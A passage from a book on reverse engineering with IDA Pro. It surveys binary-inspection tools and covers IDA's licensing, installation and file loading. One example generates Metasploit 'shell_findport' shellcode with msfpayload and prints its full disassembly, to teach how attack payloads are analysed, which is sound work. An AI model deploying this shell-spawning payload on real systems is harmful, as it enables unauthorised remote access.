more) related to object files:

Section headers

Summary information for each of the sections in the program file.

Private headers

Program memory layout information and other information required by

the runtime loader, including a list of required libraries such as that

produced by ldd.

8. See http://www.sourceware.org/binutils/docs/binutils/objdump.html#objdump/.

24 Chapter 2

Debugging information

Extracts any debugging information embedded in the program file.

Symbol information

Dumps symbol table information in a manner similar to the nm utility.

Disassembly listing

objdump performs a linear sweep disassembly of sections of the file marked

as code. When disassembling x86 code, objdump can generate either

AT&T or Intel syntax, and the disassembly can be captured as a text file.

Such a text file is called a disassembly dead listing, and while these files

can certainly be used for reverse engineering, they are difficult to navi-

gate effectively and even more difficult to modify in a consistent and

error-free manner.

objdump is available as part of the GNU binutils9 tool suite and can be

found on Linux, FreeBSD, and Windows (via Cygwin). objdump relies on the

Binary File Descriptor library (libbfd), a component of binutils, to access

object files and thus is capable of parsing file formats supported by libbfd

(ELF and PE among others). For ELF-specific parsing, a utility named readelf

is also available. readelf offers most of the same capabilities as objdump, and

the primary difference between the two is that readelf does not rely upon

libbfd.

otool

otool is most easily described as an objdump-like utility for OS X, and it is useful

for parsing information about OS X Mach-O binaries. The following listing

demonstrates how otool displays the dynamic library dependencies for a

Mach-O binary, thus performing a function similar to ldd.

idabook# file osx_example

osx_example: Mach-O executable ppc

idabook# otool -L osx_example

osx_example:

/usr/lib/libstdc++.6.dylib (compatibility version 7.0.0, current version 7.4.0)

/usr/lib/libgcc_s.1.dylib (compatibility version 1.0.0, current version 1.0.0)

/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 88.1.5)

otool can be used to display information related to a file’s headers and

symbol tables and to perform disassembly of the file’s code section. For more

information regarding the capabilities of otool, please refer to the associated

man page.

9. See http://www.gnu.org/software/binutils/.

Reversing and Disassembly Tools 25

dumpbin

dumpbin is a command-line utility included with Microsoft’s Visual Studio suite

of tools. Like otool and objdump, dumpbin is capable of displaying a wide range of

information related to Windows PE files. The following listing shows how

dumpbin displays the dynamic dependencies of the Windows calculator program

in a manner similar to ldd.

$ dumpbin /dependents calc.exe

Microsoft (R) COFF/PE Dumper Version 8.00.50727.762

Dump of file calc.exe

File Type: EXECUTABLE IMAGE

Image has the following dependencies:

SHELL32.dll

msvcrt.dll

ADVAPI32.dll

KERNEL32.dll

GDI32.dll

USER32.dll

Additional dumpbin options offer the ability to extract information from

various sections of a PE binary, including symbols, imported function names,

exported function names, and disassembled code. Additional information

related to the use of dumpbin is available via the Microsoft Developer Network

(MSDN).10

c++filt

Languages that allow function overloading must have a mechanism for dis-

tinguishing among the many overloaded versions of a function since each ver-

sion has the same name. The following C++ example shows the prototypes for

several overloaded versions of a function named demo:

void demo(void);

void demo(int x);

void demo(double x);

void demo(int x, double y);

void demo(double x, int y);

void demo(char* str);

10. See http://msdn.microsoft.com/en-us/library/c1h23y6c(VS.71).aspx.

26 Chapter 2

As a general rule, it is not possible to have two functions with the same

name in an object file. In order to allow overloading, compilers derive unique

names for overloaded functions by incorporating information describing the

type sequence of the function arguments. The process of deriving unique

names for functions with identical names is called name mangling.11 If we use

nm to dump the symbols from the compiled version of the preceding C++ code,

we might see something like the following (filtered to focus on versions of

demo):

idabook# g++ -o cpp_test cpp_test.cpp

idabook# nm cpp_test | grep demo

0804843c T _Z4demoPc

08048400 T _Z4demod

08048428 T _Z4demodi

080483fa T _Z4demoi

08048414 T _Z4demoid

080483f4 T _Z4demov

The C++ standard does not define standards for name-mangling schemes,

leaving compiler designers to develop their own. In order to decipher the

mangled variants of demo shown here, we need a tool that understands our

compiler’s (g++ in this case) name-mangling scheme. This is precisely the

purpose of the c++filt utility. c++filt treats each input word as if it were a

mangled name and then attempts to determine the compiler that was used

to generate that name. If the name appears to be a valid mangled name, it

outputs the demangled version of the name. When c++filt does not recog-

nize a word as a mangled name, it simply outputs the word with no changes.

If we pass the results of nm from the preceding example through c++filt,

it is possible to recover the demangled function names, as seen here:

idabook# nm cpp_test | grep demo | c++filt

0804843c T demo(char*)

08048400 T demo(double)

08048428 T demo(double, int)

080483fa T demo(int)

08048414 T demo(int, double)

080483f4 T demo()

It is important to note that mangled names contain additional informa-

tion about functions that nm does not normally provide. This information can

be extremely helpful in reversing engineering situations, and in more complex

cases, this extra information may include data regarding class names or

function-calling conventions.

11. For an overview of name mangling, refer to http://en.wikipedia.org/wiki/Name_mangling.

Reversing and Disassembly Tools 27

Deep Inspection Tools

So far, we have discussed tools that perform a cursory analysis of files based

on minimal knowledge of those files’ internal structure. We have also seen

tools capable of extracting specific pieces of data from files based on very

detailed knowledge of a file’s structure. In this section we discuss tools

designed to extract specific types of information independently of the type

of file being analyzed.

strings

It is occasionally useful to ask more generic questions regarding file content,

questions that don’t necessarily require any specific knowledge of a file’s

structure. One such question is “Does this file contain any embedded strings?”

Of course, we must first answer the question “What exactly constitutes a

string?” Let’s loosely define a string as a consecutive sequence of printable

characters. This definition is often augmented to specify a minimum length

and a specific character set. Thus, we could specify a search for all sequences

of at least four consecutive ASCII printable characters and print the results to

the console. Searches for such strings are generally not limited in any way

by the structure of a file. You can search for strings in an ELF binary just as

easily as you can search for strings in a Microsoft Word document.

The strings utility is designed specifically to extract string content from

files, often without regard for the format of those files. Using strings with its

default settings (7-bit ASCII sequences of at least four characters) might yield

something like the following:

idabook# strings ch2_example

/lib/ld-linux.so.2

__gmon_start__

libc.so.6

_IO_stdin_used

exit

srand

puts

time

printf

stderr

fwrite

scanf

__libc_start_main

GLIBC_2.0

PTRh

[^_]

usage: ch2_example [max]

A simple guessing game!

Please guess a number between 1 and %d.

Invalid input, quitting!

Congratulations, you got it in %d attempt(s)!

Sorry too low, please try again

Sorry too high, please try again

28 Chapter 2

Unfortunately, while we see some strings that look like they might be out-

put by the program, other strings appear to be function names and library

names. We should be careful not to jump to any conclusions regarding the

behavior of the program. Analysts often fall into the trap of attempting to

deduce the behavior of a program based on the output of strings. Remember,

the presence of a string within a binary in no way indicates that the string is

ever used in any manner by that binary.

Some final notes on the use of strings:

zWhen using strings on executable files, it is important to remember that,

by default, only the loadable, initialized sections of the file will be scanned.

Use the -a command-line argument to force strings to scan the entire

input file.

zstrings gives no indication of where, within a file, a string is located. Use

the -t command-line argument to have strings print file offset informa-

tion for each string found.

zMany files utilize alternate character sets. Utilize the -e command-line

argument to cause strings to search for wide characters such as 16-bit

Unicode.

Disassemblers

As mentioned earlier, a number of tools are available to generate dead listing–

style disassemblies of binary object files. PE, ELF, and Mach-O binaries can

be disassembled using dumpbin, objdump, and otool, respectively. None of those,

however, can deal with arbitrary blocks of binary data. You will occasionally

be confronted with a binary file that does not conform to a widely used file

format, in which case you will need tools capable of beginning the disassem-

bly process at user-specified offsets.

Two examples of such stream disassemblers for the x86 instruction set are

ndisasm and diStorm.12 ndisasm is a utility included with the Netwide Assembler

(NASM).13 The following example illustrates the use of ndisasm to disassemble

a piece of shellcode generated using the Metasploit framework.14

idabook# ./msfpayload linux/x86/shell_findport CPORT=4444 R > fs

idabook# ls -l fs

-rw-r--r-- 1 ida ida 62 Dec 11 15:49 fs

idabook# ndisasm -u fs

00000000 31D2 xor edx,edx

00000002 52 push edx

00000003 89E5 mov ebp,esp

00000005 6A07 push byte +0x7

00000007 5B pop ebx

00000008 6A10 push byte +0x10

12. See http://www.ragestorm.net/distorm/.

13. See http://nasm.sourceforge.net/.

14. See http://www.metasploit.com/.

Reversing and Disassembly Tools 29

0000000A 54 push esp

0000000B 55 push ebp

0000000C 52 push edx

0000000D 89E1 mov ecx,esp

0000000F FF01 inc dword [ecx]

00000011 6A66 push byte +0x66

00000013 58 pop eax

00000014 CD80 int 0x80

00000016 66817D02115C cmp word [ebp+0x2],0x5c11

0000001C 75F1 jnz 0xf

0000001E 5B pop ebx

0000001F 6A02 push byte +0x2

00000021 59 pop ecx

00000022 B03F mov al,0x3f

00000024 CD80 int 0x80

00000026 49 dec ecx

00000027 79F9 jns 0x22

00000029 52 push edx

0000002A 682F2F7368 push dword 0x68732f2f

0000002F 682F62696E push dword 0x6e69622f

00000034 89E3 mov ebx,esp

00000036 52 push edx

00000037 53 push ebx

00000038 89E1 mov ecx,esp

0000003A B00B mov al,0xb

0000003C CD80 int 0x80

The flexibility of stream disassembly is useful in many situations. One

scenario involves the analysis of computer network attacks in which network

packets may contain shellcode. Stream disassemblers can be used to dis-

assemble the portions of the packet that contain shellcode in order to ana-

lyze the behavior of the malicious payload. Another situation involves the

analysis of ROM images for which no layout reference can be located. Por-

tions of the ROM will contain data, while other portions will contain code.

Stream disassemblers can be used to disassemble just those portions of the

image thought to be code.

Summary

The tools discussed in this chapter are not necessarily the best of their breed.

They do, however, represent tools commonly available for anyone who wishes

to reverse engineer binary files. More important, they represent the types of

tools that motivated much of the development of IDA. In the coming chapters,

we will discuss such tools. An awareness of these tools will greatly enhance

your understanding of the IDA user interface and the many informational

displays that IDA offers.

JMP

EBP

SUB

IDA PRO BACKGROUND

The Interactive Disassembler Professional,

better and heretofore known as IDA Pro

or simply IDA is a product of Hex-Rays,1

located in Liège, Belgium. The programming

genius behind IDA is Ilfak Guilfanov, better known

as simply Ilfak. IDA began its life over a decade ago as

an MS-DOS, console-based application, which is significant in that it helps

us understand something about the nature of IDA’s user interface. Among

other things, non-GUI versions of IDA ship for all IDA-supported platforms2

and continue to use the console-style interface derived from the original

DOS versions.

At its heart, IDA is a recursive descent disassembler; however, a substantial

amount of effort has gone into developing logic to augment the recursive-

descent process. In order to overcome one of the larger shortcomings of

recursive descent, IDA employs a large number of heuristic techniques to

1. For many years, IDA was marketed by DataRescue; however, in January 2008, Ilfak moved

marketing and sales of IDA to his own company, Hex-Rays.

2. Currently supported platforms are Windows, Linux, and OS X.

32 Chapter 3

identify additional code that may not have been found during the recursive-

descent process. Beyond the disassembly process itself, IDA goes to great

lengths not only to distinguish data disassemblies from code disassemblies

but also to determine exactly what type of data is being represented by those

data disassemblies. While the code that you view in IDA is in assembly lan-

guage, one of the fundamental goals of IDA is to paint a picture as close to

source code as possible. IDA makes every effort to annotate generated disas-

semblies with not only datatype information but also derived variable and

function names. These annotations minimize the amount of raw hex and

maximize the amount of symbolic information presented to the user.

Hex-Rays’ Stance on Piracy

As an IDA user you should be aware of several facts. IDA is Hex-Rays’ flagship

product; accordingly, it is very sensitive about unauthorized distribution of

IDA. In the past, the company has seen a direct cause and effect relation-

ship between releases of pirated versions of IDA and declining sales. The

former publisher of IDA, DataRescue, has even gone so far as to post the

names of pirates to its Hall of Shame.3 IDA thus utilizes several antipiracy

techniques in an effort to curb piracy and enforce licensing restrictions.

The first technique to be aware of: Each copy of IDA is watermarked in

order to uniquely tie it to its purchaser. If a copy of IDA turns up on a warez

site, Hex-Rays has the ability to track that copy back to the original buyer,

who will then be blacklisted from future sales. It is not uncommon to find

discussions related to “leaked” copies of IDA on the IDA support forums at

Hex-Rays.

Another technique IDA uses to enforce its licensing policies involves

scanning for additional copies of IDA running on the local network. When

the Windows version of IDA is launched, a UDP packet is broadcast on

port 23945, and IDA waits for responses to see whether other instances of

IDA running under the same license key are present on the same subnet.

The number of responses is compared to the number of seats to which the

license applies, and if too many copies are found on the network, IDA will

refuse to start. Do note, however, that it is permissible to run multiple

instances of IDA on a single computer with a single license.

The final method of license enforcement centers on the use of key files

tied to each purchaser. At startup, IDA searches for a valid ida.key file. Failure

to locate a valid key file will cause IDA to shut down immediately. Key files

are also used in determining eligibility for upgraded copies of IDA. In essence,

ida.key represents your purchase receipt, and you should safeguard it to ensure

that you remain eligible for future upgrades.

3. The Hall of Shame has been migrated to the Hex-Rays website: http://www.hex-rays.com/idapro/

hallofshame.html.

IDA Pro Background 33

Obtaining IDA Pro

First and foremost, IDA is not free software. The folks at Hex-Rays make their

living in part through the sales of IDA. A limited-functionality, freeware4

version of IDA is available for people who wish to familiarize themselves with

its basic capabilities, but it doesn’t keep pace with the most recent versions.

The freeware version, discussed more extensively in Appendix A, is a stripped-

down edition of IDA 5.0 (the current version being 6.1). Along with the

freeware version, Hex-Rays also distributes a restricted-functionality demon-

stration copy5 of the current version. If the rave reviews that are found any-

where reverse engineering is discussed are not sufficient to convince you

to purchase a copy, then spending some time with either the freeware or

demo version will surely help you realize that IDA, and the customer support

that comes along with it, is well worth owning.

IDA Versions

As of version 6.0, IDA is available in GUI and console versions for Windows,

Linux, and OS X. IDA makes use of the Qt cross-platform GUI libraries to

provide a consistent user interface on all three platforms. From a functional-

ity standpoint, IDA Pro is offered in two versions: standard and advanced.

The two versions differ primarily in the number of processor architectures

for which they support disassembly. A quick look at the list of supported pro-

cessors6 shows that the standard version (approximately USD540 as of this

writing) supports more than 30 processor families, while the advanced ver-

sion (at almost twice the price) supports more than 50. Additional archi-

tectures supported in the advanced version include x64, AMD64, MIPS, PPC,

and SPARC, among others.

IDA Licenses

Two licensing options are available when you purchase IDA. From the Hex-

Rays website:7 “Named licenses are linked to a specific end-user and may be

used on as many computers as that particular end-user uses,” while “Computer

licenses are linked to a specific computer and may be used by different end-

users on that computer provided only one user is active at any time.” Note that

while a single named license entitles you to install the software on as many

computers as you like, you are the only person who may run those copies

of IDA, and, for a single license, IDA may be running on only one of those

computers at any given time.

NOTE Unlike many other software licenses for proprietary software, IDA’s license specifically

grants users the right to reverse engineer IDA.

4. See http://www.hex-rays.com/idapro/idadownfreeware.htm.

5. See http://www.hex-rays.com/idapro/idadowndemo.htm.

6. See http://www.hex-rays.com/idapro/idaproc.htm.

7. See http://www.hex-rays.com/idapro/idaorder.htm.

34 Chapter 3

Purchasing IDA

Prior to version 6.0, IDA purchases included a Windows GUI version along

with console versions for Windows, Linux, and OS X. Beginning with version

6.0, purchasers must specify exactly which operating system they wish to run

their copy of IDA on. Each copy of IDA 6.x includes console and Qt-based

GUI versions for the specified operating system only. Additional licenses for

alternate operating systems are available for a reduced price. You can pur-

chase IDA through authorized distributors listed on the IDA sales web page

or directly from Hex-Rays by fax or email. Purchased copies can be delivered

via CD or downloaded, and they entitle the buyer to a year of support and

upgrades. In addition to the IDA installer, the CD distribution contains a

variety of extras such as the IDA software development kit (SDK) and other

utilities. Users who opt to download their purchased copy of IDA typically

receive only the installer bundle and are required to download other compo-

nents separately.

Hex-Rays has been known to restrict sales to specific countries based on

its experiences with piracy in those countries. It also maintains a blacklist of

users who have violated the terms of licensing for IDA and may refuse to do

business with such users and/or their employers.

Upgrading IDA

The IDA Help menu contains an option to check for an available upgrade.

Additionally, IDA will automatically issue warnings that your support period is

about to expire based on the expiration date contained in your key file. The

upgrade process typically involves submitting your ida.key file to Hex-Rays,

which will then validate your key and provide you with details on how to obtain

your upgraded version. Should you find that your version of IDA is too old to

be eligible for an upgrade, be sure to take advantage of Hex-Rays’ reduced

upgrade pricing for holders of expired keys.

WARNING Failure to maintain close control over your key file could result in an unauthorized user

requesting your allotted upgrade, preventing you from upgrading your copy of IDA.

As a final note on upgrading any version of IDA, we highly recommend

backing up your existing IDA installation or installing your upgrade to a

completely different directory in order to avoid losing any configuration files

that you may have modified. You will need to edit the corresponding files in

your upgrade version to re-enable any changes that you have previously made.

Similarly you will need to move, recompile, or otherwise obtain new versions

of any custom IDA plug-ins that you may have been using (more about plug-

ins and the plug-in installation process in Chapter 17).

IDA Pro Background 35

IDA Support Resources

As an IDA user, you may wonder where you can turn for help when you have

IDA-related questions. If we do our job well enough, this book will suffice in

most situations. When you find yourself needing additional help, though,

here are some popular resources:

Official help documentation

IDA ships with a menu-activated help system, but it is primarily an over-

view of the IDA user interface and the scripting subsystem. No help is

available for the IDA SDK, nor is much help available when you have

questions like “How do I do x?”

Hex-Rays’ support page and forums

Hex-Rays hosts a support page8 that offers links to various IDA-related

resources, including online forums available to licensed users. Users will

find that Ilfak and other core Hex-Rays programmers are frequent con-

tributors to the forums. The forums are also a good starting point for

unofficial support of the SDK, since many experienced IDA users are

more than willing to offer assistance based on their personal experiences.

Questions concerning use of the SDK are often answered with “Read

the include files.” The SDK is officially unsupported with a purchase of

IDA; however, Hex-Rays does offer a yearly support plan for an annual

fee of USD10,000 (yep, that’s right: $10K). An excellent resource to

familiarize yourself with the SDK is “IDA Plug-in Writing in C/C++” by

Steve Micallef.9

OpenRCE.org

A vibrant reverse engineering community exists at http://www.openrce.org/,

which contains numerous articles related to novel uses of IDA along with

active user forums. Similar to the forums at Hex-Rays, OpenRCE.org

attracts a large number of experienced IDA users who are often more

than willing to share their advice on how to resolve almost any problem

you may encounter with IDA.

RCE Forums

The Reverse Code Engineering (RCE) forums at http://www.woodmann

.com/ contain countless posts related to the use of IDA Pro. The focus of

the forums is much broader than the use of IDA Pro, however, with wide

coverage of many tools and techniques useful to the binary reverse

engineer.

8. See http://www.hex-rays.com/idapro/idasupport.htm.

9. See http://www.binarypool.com/idapluginwriting/idapw.pdf.

36 Chapter 3

The IDA Palace

Though it has had problems finding a permanent residence, the IDA

Palace10 is a website dedicated to hosting information on IDA-related

resources. Visitors can expect to find links to various papers related to

IDA usage along with scripts and plug-ins for extending IDA’s capabilities.

Ilfak’s blog

Finally, Ilfak’s blog11 often contains postings detailing the use of IDA to

solve various problems ranging from general disassembly to debugging

and malware analysis. Additionally, postings by other Hex-Rays team

members often detail some of the latest IDA features, as well as features

that are under development.

Your IDA Installation

Once you calm down from the initial excitement of receiving your shiny, new

IDA CD and get down to the task of installing IDA, you will see that your CD

contains directories named utilities and sdk containing various add-on utilities

and the IDA software development kit, respectively. These will be discussed

in detail later in the book. In the root directory of the CD you will find an

installation binary. For Windows users, this binary is a traditional Windows

installer executable. For Linux and OS X users, the installation binary is a

gzipped .tar file.

Windows Installation

Installing IDA on Windows is very straightforward. IDA’s Windows installer

requires a password that is supplied with your CD or via email if you have

downloaded your copy of IDA. Launching the Windows installer walks

you through several informational dialogs, only one of which requires any

thought. As shown in Figure 3-1, you will be offered the opportunity to

specify an installation location or to accept the default suggested by the

installer. Regardless of whether you choose the default or specify an alter-

nate location, for the remainder of this book we will refer to your chosen

install location as <IDADIR>. In your IDA directory, you will find your key file,

ida.key, along with the following IDA executables:

zidag.exe is the Windows native GUI version of IDA. Beginning with ver-

sion 6.2, this file will cease to be shipped with IDA.

zidaq.exe is the Windows Qt GUI version of IDA (versions 6.0 and later).

zidaw.exe is the Windows text-mode version of IDA.

10. See http://old.idapalace.net/.

11. See http://www.hexblog.com/.

IDA Pro Background 37

Figure 3-1: Choosing your installation location

With the move to the Qt cross-platform GUI library in IDA version 6.0,

the native Windows version of IDA (idag.exe) has been deprecated and will

cease to ship with IDA beginning with version 6.2.

OS X and Linux Installation

For installation on either OS X or Linux, gunzip and untar the appropriate

archive to a location of your choosing. On a Linux system, it might look

like this:

# tar -xvzf ida61l.tgz

On an OS X system, it will look like this:

# tar -xvzf ida61m.tgz

In either case, you will have a top-level directory named ida that contains

all required files.

For both OS X and Linux, the name of the GUI version is idaq and the

name of the console version is idal. The appearance of the console version is

very similar to the Windows console version of IDA, which is shown in Fig-

ure 3-2. Linux users may need to verify (using ldd) that all shared libraries

required by IDA are available on their systems. One plug-in in particular,

IDAPython, expects to find Python version 2.6 installed. You may need to

upgrade your Python installation or create symbolic links as necessary to sat-

isfy IDA requirements.

38 Chapter 3

Figure 3-2: The console version of IDA Pro

IDA and SELinux

If you are a Linux user that has SELinux enabled, you may find that IDA

complains it “cannot enable executable stack as shared object” when attempt-

ing to load your desired processor module. The execstack command may be

used to fix this problem on a per module basis as shown here:

execstack -c <IDADIR>/procs/pc.ilx

32-bit vs. 64-bit IDA

Users of the advanced version of IDA will notice that they have two versions

of each IDA executable, such as idag.exe and idag64.exe or idaq and idaq64.

The distinction between the versions is that idax64 is capable of disassem-

bling 64-bit code; however, all of the IDA executables themselves are 32-bit

code. As a result, users running IDA on 64-bit platforms need to ensure that

any supporting software required by IDA is available in a 32-bit version. For

example, 64-bit Linux users must ensure that a 32-bit version of Python is

installed if they wish to use IDAPython for scripting. Consult the documenta-

tion for your operating system for details on mixing 32- and 64-bit software.

The IDA Directory Layout

Instant familiarity with the contents of your IDA installation is by no means

a requirement before you start using IDA. However, since our attention is

turned to your new IDA install for the moment, let’s take an initial look at

the basic layout. An understanding of the IDA directory structure will become

more important as you progress to using the more advanced features of IDA

covered later in the book. A brief description of each of the subdirectories

within the IDA installation follows (for Windows and Linux users, these

IDA Pro Background 39

are found under <IDADIR>; for OS X users, these will be found under

<IDADIR>/idaq.app/Contents/MacOS):

cfg The cfg directory contains various configuration files, including the

basic IDA configuration file ida.cfg, the GUI configuration file idagui.cfg,

and the text-mode user interface configuration file idatui.cfg. Some of

the more useful configuration capabilities of IDA will be covered in

Chapter 11.

idc The idc directory contains the core files required by IDA’s built-in script-

ing language, IDC. Scripting with IDC will be covered in more detail in

Chapter 15.

ids The ids directory contains symbol files (IDS files in IDA parlance) that

describe the content of shared libraries that may be referenced by binaries

loaded into IDA. These IDS files contain summary information that lists

all entries that are exported from a given library. These entries describe

the type and number of parameters that a function requires, the return

type (if any) of a function, and the calling convention utilized by the

function.

loaders

The loaders directory contains IDA extensions that are used during the

file-loading process to recognize and parse known file formats such as PE

or ELF files. IDA loaders will be discussed in more detail in Chapter 18.

plugins

The plugins directory contains IDA modules designed to provide addi-

tional, and in most cases user-defined, behavior for IDA. IDA plug-ins

will be discussed in greater detail in Chapter 17.

procs

The procs directory contains the processor modules supported by the

installed version of IDA. Processor modules provide the machine-

language-to-assembly-language translation capability within IDA and are

responsible for generating the assembly language displayed in the IDA

user interface. IDA processor modules will be discussed in more detail

in Chapter 19.

sig The sig directory contains signatures for existing code that IDA utilizes

for various pattern-matching operations. It is through such pattern

matching that IDA can identify sequences of code as known library code,

potentially saving you significant amounts of time in the analysis process.

The signatures are generated using IDA’s Fast Library Identification and

Recognition Technology (FLIRT), which will be covered in more detail

in Chapter 12.

40 Chapter 3

til The til directory contains type library information that IDA uses to record

the layout of data structures specific to various compiler libraries. Cus-

tomizing IDA type libraries will be discussed further in Chapter 13.

Thoughts on IDA’s User Interface

IDA’s MS-DOS heritage remains evident to this day. Regardless of the inter-

face (text or GUI) that you happen to be using, IDA makes extensive use

of hotkeys. While this is not necessarily a bad thing, it can yield unexpected

results if you believe that you are in a text-entry mode and find that nearly

every keystroke leads IDA to perform some hotkey action. For example, this

can happen while using the GUI if you position the cursor to make a change

and are expecting that anything you type will appear at the cursor location

(IDA is not your mother’s word processor).

From a data-entry perspective, IDA accepts virtually all of its input via

dialogs, so if you are attempting to enter any data at all into IDA, do make

sure you see a dialog in which to enter that data. The one exception is IDA’s

hex-editing feature, which is only available via the Hex View window.

A final point worth remembering is this: There is no undo in IDA! If you

inadvertently press a key that happens to initiate a hotkey action, do not

waste any time searching for an undo feature within IDA’s menu system—

you will not find one. Nor will you find a command history list to help you

determine what it was you just did.

Summary

With the mundane details out of the way, it is time to move on to using IDA

to accomplish something useful. Over the course of the next few chapters,

you will discover how to use IDA to perform basic file analysis, learn how to

interpret the IDA data displays, and learn how to manipulate those displays

to further your understanding of a program’s behavior.

PART II

BASIC IDA USAGE

JMP

EBP

SUB

GETTING STARTED WITH IDA

It’s about time we got down to actually

using IDA. The remainder of this book is

dedicated to various features of IDA and how

you can leverage them to best suit your reverse

engineering needs. In this chapter we begin by covering

the options you are presented with when you launch

IDA, and then we describe just what is happening when you open a binary

file for analysis. Finally, we’ll present a quick overview of the user interface to

lay the groundwork for the remaining chapters.

For the sake of standardization, examples in both this chapter and the

remainder of the book will be presented with the Windows Qt GUI interface

unless an example requires a specific, different version of IDA (such as an

example of Linux debugging).

44 Chapter 4

Launching IDA

Any time you launch IDA, you will be greeted briefly by a splash screen

that displays a summary of your license information. Once the splash

screen clears, IDA displays another dialog offering three ways to proceed

to its desktop environment, as shown in Figure 4-1.

Figure 4-1: Launching IDA

If you prefer not to see the welcome message, feel free to uncheck the

Display at startup checkbox at the bottom of the dialog. If you check the box,

future sessions will begin as if you had clicked the Go button, and you will

be taken directly to an empty IDA workspace. If at some point you find your-

self longing for the Welcome dialog (after all, it conveniently allows you to

return to recently used files), you will need to edit IDA’s registry key to set

the DisplayWelcome value back to 1. Alternatively, selecting WindowsReset

hidden messages will restore all previously hidden messages.

NOTE When installed on Windows, IDA creates the following registry key: HKEY_CURRENT_USER\

Software\Hex-Rays\IDA.1 Many options that can be configured within IDA itself (as

opposed to editing one of the configuration files) are stored within this registry key.

However, on other platforms, IDA stores such values in a binary data file ($HOME/

.idapro/ida.reg) that is not easily edited.

Each of the three options shown in Figure 4-1 offers a slightly different

method to proceed to the IDA desktop. These three launch options are

reviewed here:

NewChoosing New opens a standard File Open dialog to select the file to be

analyzed. Following file selection, one or more additional dialogs are dis-

played that allow you to choose specific file-analysis options before the

file is loaded, analyzed, and displayed.

1. Older versions of IDA used HKEY_CURRENT_USER\Software\Datarescue\IDA.

Getting Started with IDA 45

Go The Go button terminates the load process and causes IDA to open with

an empty workspace. At this point, if you want to open a file, you may

drag and drop a binary file onto your IDA desktop, or you may use one

of the options from the File menu to open a file. The FileOpen com-

mand results in a File Open dialog, as described previously. By default,

IDA utilizes a known extensions filter to limit the view of the File dialog.

Make sure that you modify or clear the filter (such as choosing All Files)

so that the File dialog correctly displays the file you are interested in

opening.2 When you open a file this way, IDA attempts to automatically

identify the selected file’s type; however, you should pay careful atten-

tion to the Loading dialog to see which loaders have been selected to

process the file.

You should utilize the Previous button when you wish to open one of the

files in the list of recent files that is directly below the Previous button.

The list of recently used files is populated with values from the History

subkey of IDA’s Windows registry key (or ida.reg on non-Windows plat-

forms). The maximum length of the history list is initially set to 10, but

this limit may be raised as high as 100 by editing the appropriate entry in

idagui.cfg or idatui.cfg (see Chapter 11). Utilizing the history list is the

most convenient option for resuming work on recently used database

files.

IDA File Loading

When choosing to open a new file using the FileOpen command, you will

be presented with the loading dialog shown in Figure 4-2. IDA generates a

list of potential file types and displays that list at the top of the dialog. This list

represents the IDA loaders that are best suited for dealing with the selected

file. The list is created by executing each of the file loaders in IDA’s loaders

directory in order to find any loaders3 that recognize the new file. Note that

in Figure 4-2, both the Windows PE loader (pe.ldw) and the MS-DOS EXE

loader (dos.ldw) claim to recognize the selected file. Readers familiar with

the PE file format will not be surprised by this, as the PE file format is an

extended form of the MS-DOS EXE file format. The last entry in the list,

Binary File, will always be present since it is IDA’s default for loading files

that it does not recognize, and this provides the lowest-level method for load-

ing any file. When offered the choice of several loaders, it is not a bad initial

strategy to simply accept the default selection unless you possess specific

information that contradicts IDA’s determination.

2. On non-Windows systems, it is not uncommon for executable files to have no file extension

at all.

3. IDA loaders will be discussed further in Chapter 18.

46 Chapter 4

Figure 4-2: The IDA Load a New File dialog

At times, Binary File will be the only entry that appears in the loader list.

In such cases, the implied message is that none of the loaders recognize the

chosen file. If you opt to continue the loading process, make sure that you

select the processor type in accordance with your understanding of the file

contents.

The Processor Type drop-down menu allows you to specify which pro-

cessor module (from IDA’s procs directory) should be used during the disa-

ssembly process. In most cases, IDA will choose the proper processor based

on information that it reads from the executable file’s headers. When IDA

can’t properly determine the processor type associated with the file being

opened, you will need to manually select a processor type before continuing

with the file-loading operation.

The Loading Segment and Loading Offset fields are active only when

the Binary File input format is chosen in conjunction with an x86 family

processor. Since the binary loader is unable to extract any memory layout

information, the segment and offset values entered here are combined to

form the base address for the loaded file content. Should you forget to specify

a base address during the initial loading process, the base address of the

IDA image can be modified at any time using the EditSegmentsRebase

Program command.

The Kernel Options buttons provide access to configure the specific disas-

sembly analysis options that IDA will utilize to enhance the recursive-descent

process. In the overwhelming majority of cases, the default options provide

Getting Started with IDA 47

the best possible disassembly. The IDA help files provide additional informa-

tion on available kernel options.

The Processor Options button provides access to configuration options

that apply to the selected processor module. However, processor options are

not necessarily available for every processor module. Limited help is available

for processor options as these options are very highly dependent on the

selected processor module and the programming proficiency of the module’s

author.

The remaining Options checkboxes are used to gain finer control over

the file-loading process. Each of the options is described further in IDA’s

help file. The options are not applicable to all input file types, and in most

cases, you can rely on the default selections. Specific cases when you may

need to modify these options will be covered in Chapter 21.

Using the Binary File Loader

When you opt to utilize the binary loader, you need to be prepared to do more

than your usual share of the processing work. With no file header information

to guide the analysis process, it is up to you to step in and perform tasks that

more capable loaders often do automatically. Examples of situations that

may call for the use of the binary loader include the analysis of ROM images

and exploit payloads that may have been extracted from network packet

captures or log files.

When the x86 processor module is paired with the binary loader, the dia-

log shown in Figure 4-3 will be displayed. With no recognizable file headers

available to assist IDA, it is up to the user to specify whether code should be

treated as 16-bit or 32-bit mode code. Other processors for which IDA can

distinguish between 16- and 32-bit modes include ARM and MIPS.

Figure 4-3: x86 mode selection

Binary files contain no information concerning their memory layout

(at least no information that IDA knows how to recognize). When an x86

processor type has been selected, base address information must be specified

in the loader dialog’s Loading Segment and Loading Offset fields, as men-

tioned earlier. For all other processor types, IDA displays the memory layout

dialog shown in Figure 4-4. As a convenience, you may create a RAM section,

a ROM section, or both and designate the address range of each. The Input

File options are used to specify which portion of the input file (the default

is the entire file) should be loaded and to which address the file content

should be mapped.

48 Chapter 4

Figure 4-4: The Memory Organization dialog

Figure 4-5 shows the last step of a binary load—a gentle reminder that

you need to do some work. The message highlights the fact that IDA has no

header information available to help it distinguish code bytes from data bytes

in the binary file. At this point, you are reminded to designate one of the

addresses in the file as an entry point by telling IDA to turn the byte(s) at

that address into code (C is the hotkey used to force IDA to treat a byte as

code). For binary files, IDA will not perform any initial disassembly until you

take the time to identify at least one byte as code.

Figure 4-5: Binary file loading

IDA Database Files

When you are happy with your loading options and click OK to close the

dialog, the real work of loading the file begins. At this point, IDA’s goal

is to load the selected executable file into memory and to analyze the

relevant portions. This results in the creation of an IDA database whose

Getting Started with IDA 49

components are stored in four files, each with a base name matching the

selected executable and whose extensions are .id0, .id1, .nam, and .til. The

.id0 file contains the content of a B-tree–style database, while the .id1 file

contains flags that describe each program byte. The .nam file contains index

information related to named program locations as displayed in IDA’s Names

